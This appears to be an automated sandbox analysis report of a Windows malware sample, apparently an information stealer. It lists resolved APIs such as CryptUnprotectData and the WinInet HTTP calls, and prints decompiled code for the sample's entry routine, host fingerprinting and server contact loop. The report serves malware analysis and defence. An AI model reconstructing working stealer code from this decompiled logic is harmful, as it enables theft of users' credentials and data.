                                                                                                                                                                        0x0040635f
                                                                                                                                                                        0x00406370
                                                                                                                                                                        0x00406384
                                                                                                                                                                        0x0040639b
                                                                                                                                                                        0x0040639d
                                                                                                                                                                        0x004063a2
                                                                                                                                                                        0x004063a8
                                                                                                                                                                        0x004063a8
                                                                                                                                                                        0x004063ad
                                                                                                                                                                        0x004063c1
                                                                                                                                                                        0x004063c3
                                                                                                                                                                        0x00406422
                                                                                                                                                                        0x00406423
                                                                                                                                                                        0x00406428
                                                                                                                                                                        0x00406430
                                                                                                                                                                        0x0040643e
                                                                                                                                                                        0x00406441
                                                                                                                                                                        0x00406448
                                                                                                                                                                        0x00406451
                                                                                                                                                                        0x0040645f
                                                                                                                                                                        0x00406465
                                                                                                                                                                        0x004063c5
                                                                                                                                                                        0x004063d3
                                                                                                                                                                        0x004063dc
                                                                                                                                                                        0x004063eb
                                                                                                                                                                        0x004063f1
                                                                                                                                                                        0x004063f3
                                                                                                                                                                        0x004063f6
                                                                                                                                                                        0x004063f6
                                                                                                                                                                        0x004063fc
                                                                                                                                                                        0x004063fc
                                                                                                                                                                        0x004063c3
                                                                                                                                                                        0x0040640a
                                                                                                                                                                        0x0040640c
                                                                                                                                                                        0x0040640c
                                                                                                                                                                        0x00406411
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004063a4
                                                                                                                                                                        0x004063a4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004063a4

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 0040639B
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 004063DC
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004063F6
                                                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0040640A
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406411
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$CloseCombineFirstFreeLocalNextPath
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3818457336-0
                                                                                                                                                                        • Opcode ID: eaed1e93e5892b48d27f800aebad6855d1cc82eb2c9bf3f724fc16a94e156a62
                                                                                                                                                                        • Instruction ID: a2e91296d065ef1b0a06dad1807512ccc5f2754619bc6de4979fdad6ab57a53e
                                                                                                                                                                        • Opcode Fuzzy Hash: eaed1e93e5892b48d27f800aebad6855d1cc82eb2c9bf3f724fc16a94e156a62
                                                                                                                                                                        • Instruction Fuzzy Hash: CE310272104316ABD714EB54DC80DBB73A8EB84314F00493EFD56A32E0DB79A919DBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                        			E0040919C(intOrPtr* _a4) {
                                                                                                                                                                        				struct _TIME_ZONE_INFORMATION _v176;
                                                                                                                                                                        				void* _t8;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        
                                                                                                                                                                        				GetTimeZoneInformation( &_v176); // executed
                                                                                                                                                                        				_t20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_push( ~(_v176.Bias));
                                                                                                                                                                        				_t8 = 0x2b;
                                                                                                                                                                        				_t15 =  >  ? _t8 : 0;
                                                                                                                                                                        				wsprintfW(_t20,  *0x40e2f4,  >  ? _t8 : 0);
                                                                                                                                                                        				_t21 = _a4;
                                                                                                                                                                        				 *_t21 = E0040A503( *_t21, _t20);
                                                                                                                                                                        				LocalFree(_t20);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}







                                                                                                                                                                        0x004091ae
                                                                                                                                                                        0x004091cc
                                                                                                                                                                        0x004091ce
                                                                                                                                                                        0x004091d1
                                                                                                                                                                        0x004091d4
                                                                                                                                                                        0x004091df
                                                                                                                                                                        0x004091e5
                                                                                                                                                                        0x004091f5
                                                                                                                                                                        0x004091f7
                                                                                                                                                                        0x00409203

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,-00000014,74655850), ref: 004091AE
                                                                                                                                                                        • wsprintfW.USER32 ref: 004091DF
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004091F7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocallstrlen$AllocGlobalInformationTimeZonewsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3282131229-0
                                                                                                                                                                        • Opcode ID: 0c261c65a445bae399a99a2b287ec62879060ec21ec3ab2ad3353035a3fa855c
                                                                                                                                                                        • Instruction ID: 22640a5e82af922e2c0672ad49884a71deb67002d2383c126f26ce4509f9bf47
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c261c65a445bae399a99a2b287ec62879060ec21ec3ab2ad3353035a3fa855c
                                                                                                                                                                        • Instruction Fuzzy Hash: 2FF096B1700210AFF714AB6AED05F6BB7F9EFC9710F008839FA46E7150D6B499118A69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E0040A672(void* __ecx) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				void* _t9;
                                                                                                                                                                        				WCHAR* _t10;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = 0x101;
                                                                                                                                                                        				_t10 =  *((intOrPtr*)( *0x40e044))(0x40, 0x202, _t9, __ecx);
                                                                                                                                                                        				GetUserNameW(_t10,  &_v8); // executed
                                                                                                                                                                        				return _t10;
                                                                                                                                                                        			}






                                                                                                                                                                        0x0040a683
                                                                                                                                                                        0x0040a68c
                                                                                                                                                                        0x0040a693
                                                                                                                                                                        0x0040a69d

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(00000000,00000101), ref: 0040A693
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                                                        • Opcode ID: d1904d6b7f39e67c7bb99d3a0e0e7b9e3097bfc240a7c331603b2b932608badc
                                                                                                                                                                        • Instruction ID: 829893f7f7874bcec709fc38dd40a9501cb2b48959beeca35c44734de89a3163
                                                                                                                                                                        • Opcode Fuzzy Hash: d1904d6b7f39e67c7bb99d3a0e0e7b9e3097bfc240a7c331603b2b932608badc
                                                                                                                                                                        • Instruction Fuzzy Hash: 13D05EB2200224BBD70097999E09ECAB6ACDB09750F000161BB15E7281D6B49E0087E9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,?,00407780), ref: 00401042
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Ole32.dll,?,?,?,?,?,00407780), ref: 00401051
                                                                                                                                                                        • LoadLibraryW.KERNEL32(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?,?,?,?,00407780), ref: 004010A1
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,HeapFree), ref: 00401297
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Sleep), ref: 00401369
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,StrToIntA), ref: 004014CB
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,StrToInt64ExW), ref: 004014E9
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CharUpperW), ref: 004015C1
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 004016F6
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFileExW), ref: 00401714
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpQueryInfoA), ref: 00401768
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpQueryInfoW), ref: 00401774
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                        • String ID: Advapi32.dll$Bcrypt.dll$CharUpperW$CloseHandle$CoCreateInstance$CoInitialize$ConvertSidToStringSidW$CopyFileW$CreateFileW$CreateMutexW$CreateProcessWithTokenW$CreateToolhelp32Snapshot$Crypt32.dll$CryptBinaryToStringW$CryptStringToBinaryA$CryptStringToBinaryW$CryptUnprotectData$DeleteFileW$DuplicateTokenEx$EnumDisplayDevicesW$ExitProcess$FindClose$FindFirstFileW$FindNextFileW$FreeLibrary$GetClientRect$GetCurrentProcess$GetDC$GetDesktopWindow$GetDriveTypeW$GetEnvironmentVariableW$GetFileSize$GetLastError$GetLocaleInfoW$GetLogicalDriveStringsW$GetModuleFileNameW$GetProcAddress$GetSystemInfo$GetSystemMetrics$GetSystemWow64DirectoryW$GetTimeZoneInformation$GetTokenInformation$GetUserDefaultLCID$GetUserDefaultLocaleName$GetUserNameW$GlobalAlloc$GlobalFree$GlobalMemoryStatusEx$HeapFree$HttpOpenRequestW$HttpQueryInfoA$HttpQueryInfoW$HttpSendRequestW$InternetCloseHandle$InternetConnectW$InternetOpenUrlA$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExW$InternetSetOptionW$LoadLibraryW$LocalAlloc$LocalFree$MultiByteToWideChar$Ole32.dll$OpenMutexW$OpenProcess$OpenProcessToken$PathCombineW$PathMatchSpecW$Process32First$Process32Next$ReadFile$RegCloseKey$RegEnumKeyExW$RegOpenKeyExW$RegQueryValueExW$ReleaseDC$SHGetFolderPathW$SHGetSpecialFolderPathW$SetCurrentDirectoryW$SetEnvironmentVariableW$Shell32.dll$ShellExecuteW$Shlwapi.dll$Sleep$StrCpyW$StrRChrW$StrStrA$StrStrIW$StrStrW$StrToInt64ExW$StrToIntA$StrToIntW$SystemFunction036$User32.dll$WideCharToMultiByte$WinInet.dll$WriteFile$kernel32.dll$lstrcmpA$lstrcmpW$lstrcmpiW$lstrcpyA$lstrcpynA$lstrlenA$lstrlenW$n$wsprintfW
                                                                                                                                                                        • API String ID: 2238633743-1859366106
                                                                                                                                                                        • Opcode ID: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
                                                                                                                                                                        • Instruction ID: 478e95b91b71f65d022eb20dd3102177344006f4c0d5f92c9651a9cba786d8dc
                                                                                                                                                                        • Opcode Fuzzy Hash: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
                                                                                                                                                                        • Instruction Fuzzy Hash: 99125671645220EFD340DFBAEFC1E6937E8AB497003105D36B624F72A1D7B899218B5E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 297 40776f-4077ae call 40100b CoInitialize call 40a4c2 call 404027 305 4077b0 297->305 306 4077d4-4077e9 297->306 307 4077b5-4077c7 305->307 310 4077f6-4077f8 ExitProcess 306->310 311 4077eb-407805 CreateMutexW call 40a0be 306->311 307->306 312 4077c9-4077d2 307->312 316 407807 call 40a1fe 311->316 317 40780c-407924 call 409fd3 * 5 call 408619 call 40a5fa call 40a672 call 40a503 * 5 LocalFree * 3 311->317 312->306 312->307 316->317 350 407927-407941 call 40a4c2 317->350 354 407951-407974 call 407c62 350->354 355 407943-40794f call 40a503 350->355 361 407995-4079a0 LocalFree 354->361 362 407976-40797e LocalFree 354->362 355->354 367 4079a6-4079d3 LocalFree * 2 call 40a24a 361->367 363 407980-407981 LocalFree 362->363 364 407987-407991 362->364 363->364 364->350 365 407993 364->365 365->367 371 407c45-407c57 LocalFree * 2 ExitProcess 367->371 372 4079d9-4079f5 call 40864c 367->372 376 4079f7-407a33 call 40a3e4 372->376 377 4079ff-407a01 ExitProcess 372->377 383 407a35-407a37 ExitProcess 376->383 384 407a3d-407b2d call 40a503 LocalFree call 40a503 * 4 SetCurrentDirectoryW GetEnvironmentVariableW call 40a503 * 2 SetEnvironmentVariableW LocalFree call 409906 LoadLibraryW 376->384 406 407b3a-407b4b LoadLibraryW 384->406 407 407b2f-407b33 call 403f9d 384->407 409 407b94-407be5 call 40a7da call 40abd8 call 4055b6 call 409bd9 call 404f7e LocalAlloc call 408a42 406->409 410 407b4d-407b75 SHGetSpecialFolderPathW call 4065d8 406->410 412 407b38-407b39 407->412 433 407bf0-407c05 LocalFree call 4073c7 409->433 434 407be7-407beb call 408add 409->434 419 407b77-407b81 call 40633e 410->419 420 407b8a 410->420 412->406 425 407b86-407b88 419->425 423 407b8d-407b8e LocalFree 420->423 423->409 425->423 438 407c07-407c08 FreeLibrary 433->438 439 407c0e-407c24 DeleteFileW LocalFree 433->439 434->433 438->439 440 407c26-407c27 FreeLibrary 439->440 441 407c2d-407c3f DeleteFileW LocalFree * 2 439->441 440->441 441->371
                                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                                        			_entry_() {
                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				WCHAR* _v20;
                                                                                                                                                                        				WCHAR* _v24;
                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                        				char _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				char _v236;
                                                                                                                                                                        				void* _t68;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                        				char _t77;
                                                                                                                                                                        				char _t78;
                                                                                                                                                                        				WCHAR* _t79;
                                                                                                                                                                        				WCHAR* _t80;
                                                                                                                                                                        				void* _t81;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        				void* _t83;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				void* _t87;
                                                                                                                                                                        				signed int _t95;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t119;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				void* _t125;
                                                                                                                                                                        				WCHAR* _t126;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				void* _t128;
                                                                                                                                                                        				void* _t129;
                                                                                                                                                                        				struct HINSTANCE__* _t140;
                                                                                                                                                                        				struct HINSTANCE__* _t142;
                                                                                                                                                                        				struct HINSTANCE__* _t156;
                                                                                                                                                                        				struct HINSTANCE__* _t159;
                                                                                                                                                                        				void* _t166;
                                                                                                                                                                        				void* _t181;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				char* _t184;
                                                                                                                                                                        				intOrPtr _t236;
                                                                                                                                                                        				intOrPtr _t238;
                                                                                                                                                                        				intOrPtr _t243;
                                                                                                                                                                        				intOrPtr _t244;
                                                                                                                                                                        				intOrPtr _t245;
                                                                                                                                                                        				intOrPtr _t246;
                                                                                                                                                                        				intOrPtr _t247;
                                                                                                                                                                        				void* _t258;
                                                                                                                                                                        				void* _t259;
                                                                                                                                                                        				WCHAR* _t260;
                                                                                                                                                                        				void* _t263;
                                                                                                                                                                        				void* _t264;
                                                                                                                                                                        				signed int _t265;
                                                                                                                                                                        				void* _t268;
                                                                                                                                                                        				struct HINSTANCE__* _t269;
                                                                                                                                                                        				void* _t271;
                                                                                                                                                                        				void* _t272;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        				intOrPtr* _t276;
                                                                                                                                                                        				void* _t277;
                                                                                                                                                                        				intOrPtr* _t278;
                                                                                                                                                                        
                                                                                                                                                                        				E0040100B(); // executed
                                                                                                                                                                        				 *0x40e064(0); // executed
                                                                                                                                                                        				_v24 = E0040A4C2("76426c3f362f5a47a469f0e9d8bc3eef");
                                                                                                                                                                        				E00404027();
                                                                                                                                                                        				_t184 =  *0x40e04c;
                                                                                                                                                                        				_t68 =  *_t184( &_v236, 0x55); // executed
                                                                                                                                                                        				if(_t68 == 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t260 = L"iqroq5112542785672901323";
                                                                                                                                                                        					_push(_t260);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0x1f0001);
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e168))() != 0) {
                                                                                                                                                                        						ExitProcess(2); // executed
                                                                                                                                                                        					}
                                                                                                                                                                        					CreateMutexW(0, 0, _t260); // executed
                                                                                                                                                                        					_t71 = E0040A0BE(); // executed
                                                                                                                                                                        					if(_t71 != 0) {
                                                                                                                                                                        						E0040A1FE();
                                                                                                                                                                        					}
                                                                                                                                                                        					_t72 = E00409FD3(0x40d998);
                                                                                                                                                                        					_t73 = E00409FD3("                                                                ");
                                                                                                                                                                        					_t74 = E00409FD3("                                                                ");
                                                                                                                                                                        					_v64 = _t72;
                                                                                                                                                                        					_v60 = _t73;
                                                                                                                                                                        					_v56 = _t74;
                                                                                                                                                                        					_v52 = E00409FD3("                                                                ");
                                                                                                                                                                        					_v48 = E00409FD3("                                                                ");
                                                                                                                                                                        					_t77 =  *0x40e314; // 0x6f57d0
                                                                                                                                                                        					_v32 = _t77;
                                                                                                                                                                        					_t78 =  *0x40e204; // 0x6d5b78
                                                                                                                                                                        					_v28 = 0;
                                                                                                                                                                        					_v44 = _t78;
                                                                                                                                                                        					_v40 = 0;
                                                                                                                                                                        					_t79 = E00408619( &_v32);
                                                                                                                                                                        					 *_t278 = 0x1000;
                                                                                                                                                                        					_v8 = _t79;
                                                                                                                                                                        					_t80 =  *((intOrPtr*)( *0x40e044))(0x40, _t184);
                                                                                                                                                                        					_v20 = _t80;
                                                                                                                                                                        					_t81 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        					_t82 = E0040A5FA(); // executed
                                                                                                                                                                        					_t258 = _t82; // executed
                                                                                                                                                                        					_t83 = E0040A672( *0x40e044); // executed
                                                                                                                                                                        					_t181 = _t83;
                                                                                                                                                                        					_t85 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t81,  *0x40e348), _t258);
                                                                                                                                                                        					_t236 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        					_t87 = E0040A503(E0040A503(_t85, _t236), _t181);
                                                                                                                                                                        					_t238 =  *0x40e308; // 0x6f5f78
                                                                                                                                                                        					_t263 = E0040A503(E0040A503(_t87, _t238), _v24);
                                                                                                                                                                        					_v16 =  *((intOrPtr*)( *0x40e13c))(_v20, _t263);
                                                                                                                                                                        					LocalFree(_t258);
                                                                                                                                                                        					LocalFree(_t181);
                                                                                                                                                                        					LocalFree(_t263);
                                                                                                                                                                        					_t182 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
                                                                                                                                                                        					_t95 = 0;
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t264 = E0040A4C2( *((intOrPtr*)(_t277 + _t95 * 4 - 0x3c)));
                                                                                                                                                                        						_push(_t264);
                                                                                                                                                                        						if( *((short*)(_t264 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x2f) {
                                                                                                                                                                        							_t264 = E0040A503(_t264, "/");
                                                                                                                                                                        						}
                                                                                                                                                                        						_t99 = E00407C62(_t264, _v16, _v8,  &_v44); // executed
                                                                                                                                                                        						_t278 = _t278 + 0xc;
                                                                                                                                                                        						_t259 = _t99;
                                                                                                                                                                        						_t100 =  *((intOrPtr*)( *0x40e08c))(_t259);
                                                                                                                                                                        						_push(_t264);
                                                                                                                                                                        						if(_t100 >= 0x40) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree();
                                                                                                                                                                        						if(_t259 == 0) {
                                                                                                                                                                        							LocalFree(_t259);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t95 = _v12 + 1;
                                                                                                                                                                        						_v12 = _t95;
                                                                                                                                                                        						if(_t95 < 5) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							L18:
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        							E0040A24A( &_v8);
                                                                                                                                                                        							if(_t259 == 0) {
                                                                                                                                                                        								L38:
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_t182);
                                                                                                                                                                        								ExitProcess(0);
                                                                                                                                                                        							}
                                                                                                                                                                        							E0040864C(_t259, _v8); // executed
                                                                                                                                                                        							_t265 = 0;
                                                                                                                                                                        							_t113 =  *((intOrPtr*)( *0x40e18c))(_t259,  *0x40e418);
                                                                                                                                                                        							if(_t113 == 0) {
                                                                                                                                                                        								L21:
                                                                                                                                                                        								ExitProcess(0xffffffff);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t265 = _t113 - _t259 >> 1;
                                                                                                                                                                        							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
                                                                                                                                                                        							_t117 =  *((intOrPtr*)( *0x40e08c))(_t259);
                                                                                                                                                                        							_t37 = _t265 + 6; // 0x6
                                                                                                                                                                        							_t119 = E0040A3E4(_t259,  &_v12, _t37, _t117); // executed
                                                                                                                                                                        							if(_t119 != 0) {
                                                                                                                                                                        								_t182 = E0040A503(_t182, _v12);
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								_t123 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t124 =  *((intOrPtr*)( *0x40e13c))(_t123, _v8);
                                                                                                                                                                        								_t243 =  *0x40e258; // 0x6d5af8
                                                                                                                                                                        								_t125 = E0040A503(_t124, _t243);
                                                                                                                                                                        								_t244 =  *0x40e370; // 0x6eee38
                                                                                                                                                                        								_t126 = E0040A503(_t125, _t244);
                                                                                                                                                                        								_v20 = _t126;
                                                                                                                                                                        								_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t128 =  *((intOrPtr*)( *0x40e13c))(_t127, _v8);
                                                                                                                                                                        								_t245 =  *0x40e258; // 0x6d5af8
                                                                                                                                                                        								_t129 = E0040A503(_t128, _t245);
                                                                                                                                                                        								_t246 =  *0x40e454; // 0x6ebff0
                                                                                                                                                                        								_v24 = E0040A503(_t129, _t246);
                                                                                                                                                                        								SetCurrentDirectoryW(_v8); // executed
                                                                                                                                                                        								GetEnvironmentVariableW( *0x40e2e0,  *((intOrPtr*)( *0x40e044))(0x40, 0x5000), 0x2800);
                                                                                                                                                                        								_t247 =  *0x40e1e8; // 0x6d5b18
                                                                                                                                                                        								_t220 = E0040A503(_t132, _t247);
                                                                                                                                                                        								_t268 = E0040A503(_t134, _v8);
                                                                                                                                                                        								SetEnvironmentVariableW( *0x40e2e0, _t268);
                                                                                                                                                                        								LocalFree(_t268);
                                                                                                                                                                        								E00409906(_t259, _t182); // executed
                                                                                                                                                                        								_t140 = LoadLibraryW(_v24); // executed
                                                                                                                                                                        								_v28 = _t140;
                                                                                                                                                                        								if(_t140 != 0) {
                                                                                                                                                                        									E00403F9D(_t220, _t140, _t259, _t182); // executed
                                                                                                                                                                        								}
                                                                                                                                                                        								_t142 = LoadLibraryW(_v20); // executed
                                                                                                                                                                        								_t269 = _t142;
                                                                                                                                                                        								_v36 = _t269;
                                                                                                                                                                        								if(_t269 != 0) {
                                                                                                                                                                        									_t166 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        									_v16 = _t166;
                                                                                                                                                                        									 *0x40e0c4(0, _t166, 0x1a, 0);
                                                                                                                                                                        									if(E004065D8(_t269) == 0) {
                                                                                                                                                                        										_t273 = _v16;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t273 = _v16;
                                                                                                                                                                        										E0040633E(_t273, _t182, _t269, 0); // executed
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_t273);
                                                                                                                                                                        								}
                                                                                                                                                                        								E0040A7DA(_t182); // executed
                                                                                                                                                                        								E0040ABD8(_t259, _t182); // executed
                                                                                                                                                                        								E004055B6(_t182); // executed
                                                                                                                                                                        								E00409BD9(_t259, _t182); // executed
                                                                                                                                                                        								E00404F7E(_t259, _t182);
                                                                                                                                                                        								_v12 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t259) + _t149);
                                                                                                                                                                        								if(E00408A42(_t259,  &_v12) > 0) {
                                                                                                                                                                        									E00408ADD(_v12, _t182); // executed
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v12); // executed
                                                                                                                                                                        								E004073C7();
                                                                                                                                                                        								_t156 = _v36;
                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                        									FreeLibrary(_t156); // executed
                                                                                                                                                                        								}
                                                                                                                                                                        								_t271 = _v20;
                                                                                                                                                                        								DeleteFileW(_t271); // executed
                                                                                                                                                                        								LocalFree(_t271);
                                                                                                                                                                        								_t159 = _v28;
                                                                                                                                                                        								if(_t159 != 0) {
                                                                                                                                                                        									FreeLibrary(_t159); // executed
                                                                                                                                                                        								}
                                                                                                                                                                        								_t272 = _v24;
                                                                                                                                                                        								DeleteFileW(_t272); // executed
                                                                                                                                                                        								LocalFree(_t272);
                                                                                                                                                                        								LocalFree(_t259);
                                                                                                                                                                        								goto L38;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								ExitProcess(0xfffffffe);
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L21;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t182 =  *((intOrPtr*)( *0x40e13c))(_t182);
                                                                                                                                                                        					LocalFree(_t264);
                                                                                                                                                                        					goto L18;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t276 = 0x40e4d8;
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_push( *_t276);
                                                                                                                                                                        					_t184 =  &_v236;
                                                                                                                                                                        					_push(_t184);
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e170))() != 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
